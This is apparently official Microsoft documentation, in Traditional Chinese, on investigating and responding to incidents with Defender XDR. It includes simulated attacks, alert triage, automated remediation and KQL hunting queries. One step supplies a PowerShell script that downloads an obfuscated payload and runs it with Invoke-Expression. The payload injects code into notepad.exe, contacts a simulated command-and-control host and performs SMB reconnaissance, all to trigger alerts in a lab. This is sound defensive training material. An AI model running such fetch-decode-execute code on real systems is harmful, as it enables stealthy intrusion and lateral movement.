共用方式為

使用 Microsoft Defender XDR 調查及回應

  • 發行項

適用於:

  • Microsoft Defender XDR

本文概述使用攻擊模擬和教學課程建立事件的程式,並使用 Microsoft Defender XDR 來調查和回應。 開始此程式之前,請確定您已檢閱過試驗 和部署 Microsoft Defender XDR 的整體程式,而且您至少已試驗Microsoft Defender XDR 的某些元件。

Microsoft Defender XDR 中的事件是相互關聯的警示和相關聯數據的集合,這些數據構成攻擊的故事。 Microsoft 365 服務和應用程式會在偵測到可疑或惡意事件或活動時建立警示。 個別警示提供有關已完成或進行中攻擊的寶貴線索。 不過,攻擊通常會對不同類型的實體採用各種技術,例如裝置、使用者和信箱。 結果是租使用者中多個實體的多個警示。

注意事項

如果您不熟悉安全性分析和事件回應,請參閱 回應您的第一個事件逐步解說 ,以取得分析、補救和事件后檢閱一般程序的導覽。

Microsoft Defender XDR 的端對端部署

這是系列中的第 6 篇文章,可協助您部署 Microsoft Defender XDR 的元件,包括調查和回應事件。

此圖顯示試驗中的事件調查和回應,並部署Microsoft Defender XDR 程式。

本系列中的文章會對應至下列端對端部署階段:

階段 連結
答: 啟動試驗 啟動試驗
B. 試驗和部署 Microsoft Defender XDR 元件 - 試驗和部署適用於身分識別的Defender

- 試驗和部署適用於 Office 365 的 Defender

- 試驗和部署適用於端點的Defender

- 試驗和部署適用於雲端應用程式Microsoft Defender
C. 調查和回應威脅 本文 (實作事件調查和回應)

在試驗和部署期間,您隨時都可以使用模擬攻擊建立事件,並使用 Microsoft Defender 入口網站來調查和回應,以測試Microsoft Defender XDR 的事件回應和自動化調查和補救功能。

使用 Microsoft Defender XDR 進行事件調查和回應的工作流程

以下是在生產環境中使用 Microsoft Defender XDR 調查和回應事件的工作流程。

顯示事件調查和回應步驟的圖表。

依照下列步驟執行:

  1. 使用 Microsoft Defender 入口網站模擬攻擊
  2. 設定事件優先順序
  3. 管理事件
  4. 使用控制中心檢查自動化調查和回應
  5. 使用進階搜捕

步驟 1. 使用 Microsoft Defender 入口網站模擬攻擊

Microsoft Defender 入口網站具有內建功能,可在您的試驗環境中建立模擬攻擊:

適用於 Office 365 的 Defender 攻擊模擬訓練

適用於 Office 365 的 Defender Microsoft 365 E5 或適用於 Office 365 的 Microsoft Defender 方案 2 包含網路釣魚攻擊的攻擊模擬訓練。 基本步驟如下:

  1. 建立模擬

    如需如何建立和啟動新仿真的逐步指示,請參閱 模擬網路釣魚攻擊

  2. 建立承載

    如需如何建立承載以在模擬中使用的逐步指示,請參閱 建立攻擊模擬訓練的自定義承載

  3. 取得深入解析

    如需如何使用報告取得深入解析的逐步指示,請參閱 透過攻擊模擬訓練取得見解

如需詳細資訊,請參閱 模擬

適用於端點的Defender攻擊教學課程 & 模擬

以下是來自 Microsoft 的適用於端點的 Defender 模擬:

  • 文件捨棄後門程式
  • 自動調查 (後門)

有來自第三方來源的其他模擬。 另外還有一組教學課程。

針對每個模擬或教學課程:

  1. 下載並閱讀所提供的對應逐步解說檔。

  2. 下載模擬檔案。 您可以選擇在測試裝置上下載檔案或腳本,但這不是必要的。

  3. 如逐步解說檔中的指示,在測試裝置上執行模擬檔案或腳本。

如需詳細資訊,請 參閱透過模擬攻擊Microsoft適用於端點的Defender體驗

使用隔離的域控制器和用戶端裝置 (選擇性) 來模擬攻擊

在此選擇性事件響應練習中,您將使用PowerShell腳本模擬獨立 Active Directory 網域服務 (AD DS) 域控制器和 Windows 裝置的攻擊,然後調查、補救及解決事件。

首先,您需要將端點新增至試驗環境。

新增試驗環境端點

首先,您需要將隔離的AD DS域控制器和 Windows 裝置新增至試驗環境。

  1. 確認您的試驗環境租 用戶已啟用 Microsoft Defender XDR

  2. 確認您的網域控制器:

  3. 確認您的測試裝置:

如果您使用租使用者和裝置群組,請為測試裝置建立專用裝置群組,並將其推送至最上層。

其中一個替代方法是在 Azure 基礎結構服務中將 AD DS 域控制器和測試裝置裝載為虛擬機Microsoft。 您可以使用 模擬企業測試實驗室指南第 1 階段中的指示,但略過建立 APP1 虛擬機。

以下是結果。

使用模擬企業測試實驗室指南的評估環境圖表。

您將模擬利用進階技術來隱藏偵測的複雜攻擊。 攻擊會列舉在域控制器上開啟的伺服器消息塊 (SMB) 工作階段,並擷取使用者裝置最近的IP位址。 此類攻擊通常不包含在犧牲者裝置上卸除的檔案,而且只會在記憶體中發生。 他們使用現有的系統和系統管理工具「即時存取」,並將其程式代碼插入系統進程中,以隱藏其執行。 這類行為可讓他們規避偵測並保存在裝置上。

在此模擬中,我們的範例案例會從 PowerShell 腳本開始。 在真實世界中,使用者可能會被誘騙執行腳本,或腳本可能會從先前受感染裝置的遠端連線到另一部計算機執行,這表示攻擊者嘗試在網路中橫向移動。 偵測這些腳本可能很困難,因為系統管理員通常也會從遠端執行腳本,以執行各種系統管理活動。

無檔案 PowerShell 攻擊的螢幕快照,其中包含進程插入和 SMB 偵察攻擊。

在模擬期間,攻擊會將殼層程式代碼插入看似無害的程式。 此案例需要使用 notepad.exe。 我們選擇此程式進行模擬,但攻擊者更可能以長時間執行的系統進程為目標,例如 svchost.exe。 殼層程式代碼接著會繼續連絡攻擊者的命令控制 (C2) 伺服器,以接收如何繼續的指示。 腳本會嘗試對域控制器執行偵察查詢, (DC) 。 偵察可讓攻擊者取得最近使用者登入資訊的相關信息。 一旦攻擊者擁有這項資訊,他們就可以在網路中橫向移動以取得特定敏感性帳戶

重要事項

如需最佳結果,請盡可能遵循攻擊模擬指示。

執行隔離的 AD DS 域控制器攻擊模擬

若要執行攻擊案例模擬:

  1. 確定您的試驗環境包含隔離的AD DS域控制器和 Windows 裝置。

  2. 使用測試用戶帳戶登入測試裝置。

  3. 在測試裝置上開啟 Windows PowerShell 視窗。

  4. 複製下列模擬文稿:

    [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
;$xor = [System.Text.Encoding]::UTF8.GetBytes('WinATP-Intro-Injection');
$base64String = (Invoke-WebRequest -URI "https://wcdstaticfilesprdeus.blob.core.windows.net/wcdstaticfiles/MTP_Fileless_Recon.txt" -UseBasicParsing).Content;Try{ $contentBytes = [System.Convert]::FromBase64String($base64String) } Catch { $contentBytes = [System.Convert]::FromBase64String($base64String.Substring(3)) };$i = 0;
$decryptedBytes = @();$contentBytes.foreach{ $decryptedBytes += $_ -bxor $xor[$i];
$i++; if ($i -eq $xor.Length) {$i = 0} };Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($decryptedBytes))

    注意事項

    如果您在網頁瀏覽器上開啟本文,在複製全文時可能會遇到問題,而不會遺失特定字元或引進額外的換行符。 如果是這種情況,請下載這份檔,並在 Adobe Reader 上開啟。

  5. 在 PowerShell 視窗中貼上並執行複製的腳本。

注意事項

如果您使用遠端桌面通訊協定 (RDP) 執行 PowerShell,請在 RDP 用戶端中使用 [類型剪貼簿文字] 命令,因為 CTRL-V 快速鍵或滑鼠右鍵貼上方法可能無法運作。 最新版本的PowerShell有時也不會接受該方法,您可能必須先複製到記憶體中的記事本、將它複製到虛擬機中,然後貼到PowerShell中。

幾秒鐘之後,[記事本] 應用程式就會開啟。 仿真的攻擊碼會插入記事本中。 讓自動產生的記事本實例保持開啟,以體驗完整的案例。

仿真的攻擊程式代碼會嘗試與外部IP位址通訊, (模擬 C2 伺服器) ,然後嘗試透過SMB對域控制器進行偵察。

當此文稿完成時,您會在 PowerShell 控制臺上看到此訊息:

ran NetSessionEnum against [DC Name] with return code result 0

若要查看自動化事件和回應功能的運作方式,請保持開啟 notepad.exe 程式。 您會看到自動事件和回應停止記事本程式。

調查模擬攻擊的事件

注意事項

在逐步引導您完成此模擬之前,請觀看下列影片,以瞭解事件管理如何協助您在調查程式中將相關警示分段在一起、您可以在入口網站中找到這些警示,以及它如何協助您進行安全性作業:

切換至 SOC 分析師的觀點,您現在可以在 Microsoft Defender 入口網站中開始調查攻擊。

  1. 開啟 Microsoft Defender 入口網站

  2. 從瀏覽窗格中,選 取 [事件 & 警示 > 事件]

  3. 模擬攻擊的新事件會出現在事件佇列中。

    事件佇列範例的螢幕快照。

將攻擊調查為單一事件

Microsoft Defender XDR 會將分析相互關聯,並將來自不同產品的所有相關警示和調查匯總成一個事件實體。 如此一來,Microsoft Defender XDR 會顯示更廣泛的攻擊案例,讓 SOC 分析師瞭解並回應複雜的威脅。

在此模擬期間產生的警示會與相同的威脅相關聯,因此會自動匯總為單一事件。

若要檢視事件:

  1. 開啟 Microsoft Defender 入口網站

  2. 從瀏覽窗格中,選 取 [事件 & 警示 > 事件]

  3. 按兩下事件名稱左側的圓形,以選取最新的專案。 側邊面板會顯示事件的其他相關信息,包括所有相關的警示。 每個事件都有唯一的名稱,可根據它所包含警示的屬性來描述它。

    儀錶板中顯示的警示可以根據服務資源進行篩選:Microsoft適用於身分識別的Defender、適用於雲端應用程式的 Microsoft Defender、適用於端點的 Microsoft Defender、Microsoft Defender XDR 和適用於 Office 365 的 Microsoft Defender。

  4. 選取 [開啟事件頁面 ] 以取得事件的詳細資訊。

    在 [ 事件 ] 頁面中,您可以看到與事件相關的所有警示和資訊。 此資訊包括與警示相關的實體和資產、 (警示的偵測來源,例如適用於身分識別的 Microsoft Defender 或適用於端點的 Microsoft Defender) ,以及它們連結在一起的原因。 檢閱事件警示清單會顯示攻擊的進度。 在此檢視中,您可以查看並調查個別警示。

    您也可以從右側功能表單擊 [ 管理事件 ]、標記事件、指派給您自己,以及新增批註。

查看已產生的警示

讓我們看看模擬攻擊期間產生的一些警示。

注意事項

我們將只逐步解說模擬攻擊期間所產生的一些警示。 根據測試裝置上執行的 Windows 和 Microsoft Defender XDR 產品版本,您可能會看到更多以稍微不同順序出現的警示。

所產生警示範例的螢幕快照。

警示: (來源觀察到可疑的進程插入:Microsoft適用於端點的Defender)

進階攻擊者會使用複雜且隱秘的方法來保存在記憶體中,並從偵測工具中隱藏。 其中一個常見技術是從受信任的系統進程中操作,而不是惡意的可執行檔,讓偵測工具和安全性作業難以找出惡意代碼。

為了讓SOC分析師能夠攔截這些進階攻擊,Microsoft Defender for Endpoint 中的深層記憶體感測器可為我們的雲端服務提供前所未有的各種跨進程程式代碼插入技術可見度。 下圖顯示如何偵測適用於端點的Defender,並在嘗試將程式代碼插入 至notepad.exe時發出警示。

插入潛在惡意代碼的警示範例螢幕快照。

警示:進程執行時所觀察到的非預期行為,沒有命令行自變數, (來源:Microsoft適用於端點的 Defender)

Microsoft適用於端點的 Defender 偵測通常以攻擊技術最常見的屬性為目標。 這個方法可確保持久性,並引發攻擊者切換到較新策略的橫條。

我們採用大規模學習演算法來建立組織內和全球通用程式的正常行為,並監看這些程式何時顯示異常行為。 這些異常行為通常表示已引進無關的程式代碼,並且正在其他信任的進程中執行。

在此案例中, 程式notepad.exe 呈現異常行為,涉及與外部位置的通訊。 此結果與用來引進和執行惡意代碼的特定方法無關。

注意事項

因為此警示是以需要額外後端處理的機器學習模型為基礎,所以您可能需要一些時間才能在入口網站中看到此警示。

請注意,警示詳細數據包含外部IP位址,這是一個指標,可讓您用來作為展開調查的樞紐。

選取警示程式樹狀結構中的IP位址,以檢視IP位址詳細數據頁面。

沒有命令行自變數的進程執行非預期行為範例螢幕快照。

下圖顯示選取的 [IP 位址詳細數據] 頁面, (按兩下 [警示程式] 樹狀結構中的 [IP 位址]) 。

IP 位址詳細數據頁面範例的螢幕快照。

警示:SMB) (來源 (使用者和IP位址偵察:Microsoft適用於身分識別的Defender)

使用伺服器消息塊 (SMB) 通訊協定列舉可讓攻擊者取得最新的使用者登入資訊,協助他們橫向透過網路移動以存取特定敏感性帳戶。

在此偵測中,當SMB會話列舉針對域控制器執行時,就會觸發警示。

Microsoft使用者和IP位址偵察的適用於身分識別的Defender警示範例螢幕快照。

使用適用於端點的 Microsoft Defender 檢閱裝置時程表

探索此事件中的各種警示之後,請流覽回您稍早調查的事件頁面。 選取事件頁面中的 [ 裝置 ] 索引標籤,以檢閱適用於端點Microsoft Defender 和適用於身分識別的 Microsoft Defender 所報告的涉及此事件的裝置。

選取發生攻擊的裝置名稱,以開啟該特定裝置的實體頁面。 在該頁面中,您可以看到已觸發的警示和相關事件。

選取 [時程表] 索引標籤 以開啟裝置時間軸,並依時間順序檢視裝置上觀察到的所有事件和行為,並插入引發的警示。

具有行為之裝置時間軸範例的螢幕快照。

擴充一些更有趣的行為可提供有用的詳細數據,例如進程樹狀結構。

例如,向下卷動,直到您發現 觀察到可疑進程插入的警示事件為止。 選 取插入powershell.exe notepad.exe 下方的進程 事件,以在側邊窗格的 [ 事件實體 ] 圖形下方顯示此行為的完整進程樹狀結構。 如有必要,請使用搜尋列進行篩選。

所選取 PowerShell 檔案建立行為之進程樹狀結構範例的螢幕快照。

使用適用於雲端應用程式的 Microsoft Defender 檢閱使用者資訊

在事件頁面上,選取 [ 使用者] 索引標籤,以顯示參與攻擊的用戶清單。 此數據表包含每個使用者的其他相關信息,包括每個使用者 的調查優先順序 分數。

選取使用者名稱以開啟使用者的配置檔頁面,以便進行進一步的調查。 深入瞭解調查有風險的使用者

適用於 Cloud Apps 的範例 Defender 用戶頁面螢幕快照。

自動化調查與補救措施

注意事項

在逐步引導您完成此模擬之前,請觀看下列影片以熟悉什麼是自動化自我修復、在入口網站中找到它的位置,以及它如何協助您的安全性作業:

流覽回 Microsoft Defender 入口網站中的事件。 [事件] 頁面中的 [調查] 索引卷標會顯示 Microsoft Defender for Identity 和 Microsoft Defender for Endpoint 所觸發的自動化調查。 下列螢幕快照只會顯示適用於端點的Defender所觸發的自動化調查。 根據預設,適用於端點的 Defender 會自動補救佇列中找到的成品,這需要補救。

與事件相關的自動化調查範例螢幕快照。

選取觸發調查的警示,以開啟 [調查詳細數據 ] 頁面。 您會看到下列詳細資料:

  • 觸發自動化調查的警示 () 。
  • 受影響的用戶和裝置。 如果在其他裝置上找到指標,也會列出這些額外的裝置。
  • 辨識項清單。 找到並分析的實體,例如檔案、進程、服務、驅動程式和網路位址。 這些實體會進行分析,以瞭解警示的可能關聯性,並將其評等為良性或惡意。
  • 找到威脅。 在調查期間找到的已知威脅。

注意事項

視時間而定,自動化調查可能仍在執行中。 請稍候幾分鐘,讓程式完成,然後再收集並分析辨識項並檢閱結果。 重新整理 [調查詳細數據 ] 頁面以取得最新的結果。

[調查詳細數據] 頁面範例的螢幕快照。

在自動化調查期間,Microsoft適用於端點的Defender識別出 notepad.exe 程式,其插入為其中一個需要補救的成品。 適用於端點的 Defender 會在自動化補救過程中自動停止可疑的進程插入。

您可以看到 notepad.exe 從測試裝置上執行的進程清單中消失。

解決事件

在調查完成並確認要補救之後,您就可以解決此事件。

從 [ 事件 ] 頁面,選取 [管理事件]。 將狀態設定為 [解決事件 ],然後針對分類選取 [True 警示 ],並選取 [ 安全性測試 ] 進行判斷。

事件頁面範例的螢幕快照,其中已開啟 [管理事件] 面板,您可以在其中按兩下參數來解決事件。

當事件解決時,它會解決 Microsoft Defender 入口網站和相關入口網站中所有相關聯的警示。

這會包裝事件分析、自動化調查和事件解決的攻擊模擬。

步驟 2. 設定事件優先順序

您可以在 Microsoft Defender 入口網站快速啟動時,從事件 & 警示>事件進入事件佇列。 以下為範例。

Microsoft Defender 入口網站中 [事件 & 警示] 區段的螢幕快照。

[最近的事件和警示] 區段會顯示過去 24 小時內收到的警示數目和建立的事件數目圖表。

若要檢查事件清單,並排定其指派和調查重要性的優先順序,您可以:

  • 設定可自定義的數據行 (選取 [ 選擇 數據行) ,讓您瞭解事件或受影響實體的不同特性。 這可協助您針對事件的優先順序做出明智的決策以進行分析。

  • 使用篩選來專注於特定案例或威脅。 在事件佇列上套用篩選有助於判斷哪些事件需要立即注意。

從預設事件佇列中,選取 [篩選] 以查看 [ 篩選 ] 窗格,您可以從中指定一組特定的事件。 以下為範例。

Microsoft Defender 入口網站中 [事件 & 警示] 區段的 [篩選] 窗格螢幕快照。

如需詳細資訊,請參閱 優先處理事件

步驟 3. 管理事件

您可以從事件的 [管理事件]窗格管理事件。 以下為範例。

Microsoft Defender 入口網站中 [事件 & 警示] 區段的 [管理事件] 窗格螢幕快照。

您可以從下列上的 [ 管理事件 ] 連結顯示此窗格:

  • 事件佇列中事件的 [屬性] 窗格。
  • 事件的摘要頁面。

以下是您可以管理事件的方式:

  • 編輯事件名稱

    根據您的安全性小組最佳做法,變更自動指派的名稱。

  • 新增事件標籤

    新增安全性小組用來分類事件的標籤,稍後可進行篩選。

  • 指派事件

    將它指派給用戶帳戶名稱,稍後可以進行篩選。

  • 解決事件

    修復事件之後,請關閉該事件。

  • 設定其分類和判斷

    當您解決事件時,請分類並選取威脅類型。

  • 新增註解

    根據您的安全性小組最佳做法,使用進度、附註或其他資訊的批注。 完整的批註歷程記錄可從事件詳細數據頁面中的 [ 批注和歷程記錄 ] 選項取得。

如需詳細資訊,請 參閱管理事件

步驟 4. 使用控制中心檢查自動化調查和回應

根據貴組織設定自動化調查及回應功能的方式,將自動或僅在安全性作業小組核准後採取補救動作。 所有動作,不論是擱置或已完成,都會列在 控制中心,其中列出裝置的擱置和已完成補救動作、電子郵件 & 共同作業內容,以及一個位置的身分識別。

以下為範例。

Microsoft Defender 入口網站中整合控制中心的螢幕快照。

您可以從控制中心選取擱置中的動作,然後在飛出視窗窗格中核准或拒絕這些動作。 以下為範例。

窗格的螢幕快照,其中顯示在 Microsoft Defender 入口網站中核准或拒絕動作的選項。

儘快核准 (或拒絕) 擱置的動作,讓您的自動化調查能夠及時繼續並完成。

如需詳細資訊,請參閱 自動化調查和回應控制中心

步驟 5. 使用進階搜捕

注意事項

在逐步引導您進行進階搜捕模擬之前,請觀看下列影片以了解進階搜捕概念、查看您可以在入口網站中找到它的位置,以及瞭解它如何協助您進行安全性作業。


如果 選擇性的無檔案 PowerShell 攻擊模擬 是已到達認證存取階段的實際攻擊,您可以在調查的任何時間點使用進階搜捕,使用您已從產生的警示和受影響的實體得知的內容,主動搜尋網路中的事件和記錄。

例如,根據 使用者和IP位址偵察 (SMB) 警示中的資訊,您可以使用 IdentityDirectoryEvents 資料表來尋找所有 SMB 會話列舉事件,或使用 IdentityQueryEvents 資料表在適用於身分識別的 Defender 數據Microsoft中尋找其他各種通訊協定中的更多探索活動。

搜捕環境需求

此模擬需要單一內部信箱和裝置。 您也需要外部電子郵件帳戶來傳送測試訊息。

  1. 確認您的租用戶已啟用 Microsoft Defender XDR。

  2. 識別要用於接收電子郵件的目標信箱。

    • 此信箱必須由適用於 Office 365 的 Microsoft Defender 監視

    • 需求 3 中的裝置必須存取此信箱

  3. 設定測試裝置:

    a. 請確定您使用的是 Windows 10 1903 版或更新版本。

    b. 將測試裝置加入測試網域。

    c. 開啟 Microsoft Defender 防病毒軟體] 。 如果您無法啟用 Microsoft Defender 防病毒軟體,請參閱 此疑難解答主題

    d. 上線以Microsoft適用於端點的Defender

執行模擬

  1. 從外部電子郵件帳戶,將電子郵件傳送至搜捕環境需求一節的步驟 2 所識別的信箱。 包含可透過任何現有電子郵件篩選原則允許的附件。 此檔案不需要是惡意或可執行檔。 建議的文件類型 .pdf.exe (如果允許) ,或 Office 檔類型,例如 Word 檔案。

  2. 開啟裝置所傳送的電子郵件,此裝置已設定為搜捕環境需求一節的步驟 3 中所定義。 開啟附件或將檔案儲存至裝置。

Go 搜捕

  1. 開啟 Microsoft Defender 入口網站

  2. 從瀏覽窗格中,選取 [搜捕進階搜捕 > ]

  3. 建置從收集電子郵件事件開始的查詢。

    1. 取 [追加查詢 > ]

    2. 在 [進階搜捕] 底下的 [電子郵件群組] 中,按兩下 [EmailEvents]。 您應該會在查詢視窗中看到此資訊。

      EmailEvents

    3. 將查詢的時間範圍變更為過去 24 小時。 假設您在執行上述模擬時傳送的電子郵件是過去 24 小時,否則請視需要變更時間範圍。

    4. 選取 [執行查詢]。 視您的試驗環境而定,您可能會有不同的結果。

      注意事項

      如需限制數據傳回的篩選選項,請參閱下一個步驟。

      Microsoft Defender 入口網站中 [進階搜捕] 頁面的螢幕快照。

      注意事項

      進階搜捕會將查詢結果顯示為表格式數據。 您也可以選擇以其他格式類型來檢視數據,例如圖表。

    5. 查看結果,並查看您是否可以識別您開啟的電子郵件。 訊息最多可能需要兩小時才會顯示在進階搜捕中。 若要縮小結果範圍,您可以將 其中 條件新增至查詢,只尋找具有 「yahoo.com」 的電子郵件作為其 SenderMailFromDomain。 以下為範例。

      EmailEvents
| where SenderMailFromDomain == "yahoo.com"

    6. 按兩下查詢中產生的數據列,即可檢查記錄。

      Microsoft Defender 入口網站中 [進階搜捕] 頁面的 [檢查記錄] 區段螢幕快照。

  4. 既然您已確認可以看到電子郵件,請新增附件的篩選條件。 將焦點放在環境中具有附件的所有電子郵件。 針對此模擬,請專注於輸入電子郵件,而不是從您的環境傳送的電子郵件。 拿掉您已新增的任何篩選,以找出您的訊息並新增 “|where AttachmentCount > 0 and EmailDirection == “Inbound””

    下列查詢會顯示結果,其清單比您對所有電子郵件事件的初始查詢還要短:

    EmailEvents
| where AttachmentCount > 0 and EmailDirection == "Inbound"

  5. 接下來,包含附件 (的相關信息,例如:檔名、) 至結果集的哈希。 若要這樣做,請加入 EmailAttachmentInfo 數據 表。 在此案例中,用於聯結的常見字段是 NetworkMessageIdRecipientObjectId

    下列查詢也包含其他行 “| project-rename EmailTimestamp=Timestamp“,可協助識別哪些時間戳與您將在下一個步驟中新增的檔案動作相關的電子郵件與時間戳相關。

    EmailEvents
| where AttachmentCount > 0 and EmailDirection == "Inbound"
| project-rename EmailTimestamp=Timestamp
| join EmailAttachmentInfo on NetworkMessageId, RecipientObjectId

  6. 接下來,使用 EmailAttachmentInfo 數據表中的 SHA256 值來尋找 DeviceFileEvents (在該哈希的端點) 上發生的檔案動作。 此處的常見欄位將是附件的SHA256哈希。

    產生的數據表現在包含端點 (Microsoft 適用於端點的 Defender) 的詳細數據,例如裝置名稱、在此情況下 (執行的動作、篩選為只包含 FileCreated 事件) ,以及檔案的儲存位置。 也會包含與進程相關聯的帳戶名稱。

    EmailEvents
| where AttachmentCount > 0 and EmailDirection == "Inbound"
| project-rename EmailTimestamp=Timestamp
| join EmailAttachmentInfo on NetworkMessageId, RecipientObjectId
| join DeviceFileEvents on SHA256
| where ActionType == "FileCreated"

    您現在已建立查詢,以識別使用者開啟或儲存附件的所有輸入電子郵件。 您也可以精簡此查詢,以篩選特定寄件者網域、檔案大小、檔類型等等。

  7. 函式是一種特殊的聯結,可讓您提取更多有關檔案的 TI 數據,例如其普遍性、簽署者和簽發者資訊等。若要取得檔案的詳細數據,請使用 FileProfile () 函式擴充:

    EmailEvents
| where AttachmentCount > 0 and EmailDirection == "Inbound"
| project-rename EmailTimestamp=Timestamp
| join EmailAttachmentInfo on NetworkMessageId, RecipientObjectId
| join DeviceFileEvents on SHA256
| where ActionType == "FileCreated"
| distinct SHA1
| invoke FileProfile()

建立偵測

建立查詢以識別您想要在未來是否發生 警示 的信息之後,您可以從查詢建立自定義偵測。

自定義偵測會根據您設定的頻率來執行查詢,而查詢的結果會根據您選擇的受影響資產建立安全性警示。 這些警示會與事件相互關聯,而且可以分級為其中一個產品所產生的任何其他安全性警示。

  1. 在查詢頁面上,移除 Go 搜捕指示步驟 7 中新增的第 7 行和第 8 行,然後按兩下 [ 建立偵測規則]

    Microsoft Defender 入口網站中 [進階搜捕] 頁面的 [查詢編輯] 區段螢幕快照。

    注意事項

    如果您按兩下 [建立偵測規則 ],且查詢中有語法錯誤,則不會儲存偵測規則。 再次檢查您的查詢,以確保沒有任何錯誤。

  2. 在必要欄位中填入可讓安全性小組瞭解警示、產生警示的原因,以及您預期會採取哪些動作的資訊。

    Microsoft Defender 入口網站中 [警示詳細數據] 頁面的螢幕快照。

    請務必清楚填寫字段,以協助下一位使用者瞭解此偵測規則警示的相關決策

  3. 選取此警示中受影響的實體。 在此情況下,請選取 [裝置 ] 和 [ 信箱]

    Microsoft Defender 入口網站中 [受影響的實體詳細數據] 頁面的螢幕快照。

  4. 判斷觸發警示時應該採取哪些動作。 在此情況下,請執行防病毒軟體掃描,但可以採取其他動作。

    Microsoft Defender 入口網站中 [動作] 頁面的螢幕快照。

  5. 選取警示規則的範圍。 由於此查詢牽涉到裝置,因此裝置群組與此自定義偵測有關,根據適用於端點Microsoft Defender 內容。 建立不包含裝置作為受影響實體的自定義偵測時,範圍不適用。

    Microsoft Defender 入口網站中 [範圍] 頁面的螢幕快照。

    在此試驗中,您可能想要將此規則限制為生產環境中測試裝置的子集。

  6. 選取 [建立]。 然後,從瀏覽面板中選取 [ 自定義偵測規則 ]。

    Microsoft Defender 入口網站中 [自定義偵測規則規則] 選項的螢幕快照。

    在 Microsoft Defender 入口網站中顯示偵測規則和執行詳細數據的頁面螢幕快照。

    您可以從此頁面選取偵測規則,以開啟詳細數據頁面。

    此頁面的螢幕快照,其中顯示 Microsoft Defender 入口網站中所觸發警示的詳細數據。

進階搜捕的專家訓練

追蹤敵人 是一系列網路廣播,適用於新的安全性分析師和經驗豐富的威脅搜捕者。 它會引導您完成進階搜捕的基本概念,以建立您自己的複雜查詢。

請參閱 取得進階搜捕的專家訓練 以開始使用。

下一步

[調查] 中的資訊並以 Microsoft Defender XDR 回應 到您的 SecOps 程式中。